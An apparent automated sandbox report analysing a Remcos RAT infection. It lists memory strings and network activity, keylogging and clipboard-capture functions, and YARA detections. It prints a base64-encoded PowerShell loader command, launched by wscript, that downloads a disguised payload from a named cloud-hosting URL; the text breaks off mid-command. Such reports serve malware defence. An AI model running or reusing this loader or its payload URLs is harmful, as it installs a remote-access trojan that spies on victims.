                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp3
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0:
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0H
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0I
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0Q
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://ocsp.msocsp.com0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://ocsp.msocsp.com0S
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000004.00000002.2940617562.00000233DC3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2664935564.0000021680631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://www.digicert.com/CPS0~
                      Source: MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                      Source: MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                      Source: MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                      Source: MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                      Source: MSBuild.exe, 0000000B.00000002.2761597224.0000000000EF4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                      Source: MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?137019cd0ea2ea141b322d7a
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?420dfb4adf33cca8e8445be7
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                      Source: powershell.exe, 00000004.00000002.2940617562.00000233DC3A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2940617562.00000233DC38B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2664935564.0000021680631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?110eb0177c05b2ea3775fea8
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?e2a80f8d2c945664c83931e8
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?7ef117c32775e4d2c961085bcb227765
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?b667cfe495ba4e8bf765a44145cc83a9
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: wscript.exe, 00000000.00000002.2993603208.00000137F14D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F14CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992820674.00000137F14D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: MSBuild.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-12-20-17/PreSignInSettingsConfig.json
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=8e832d08b03a8a30c06e
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=e13eef
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                      Source: wscript.exe, 00000000.00000002.2993603208.00000137F14D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F14CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992820674.00000137F14D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/
                      Source: powershell.exe, 00000004.00000002.2940185943.00000233DC2E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v17
                      Source: powershell.exe, 00000006.00000002.2664729519.00000216801A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgp
                      Source: wscript.exe, 00000000.00000002.2993688674.00000137F3240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2374286860.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991573495.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992223390.00000137F1428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993443782.00000137F1429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991758949.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993888591.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992154625.00000137F141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_
                      Source: wscript.exe, 00000000.00000002.2993537998.00000137F1495000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992132173.00000137F1493000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F1481000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992084729.00000137F1489000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992399181.00000137F15A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992223390.00000137F1428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993603208.00000137F14D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F14CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992820674.00000137F14D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992154625.00000137F141B000.00000004.00000020.00020000.00000000.sdmp, bhvFC84.tmp.11.drString found in binary or memory: https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfile
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: MSBuild.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://www.office.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.12:49719 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000010_2_004099E4
                      Installs a global keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_0040987A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_00406E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004068B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_004072B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,10_2_00409B10
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041BB77 SystemParametersInfoW,10_2_0041BB77

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8A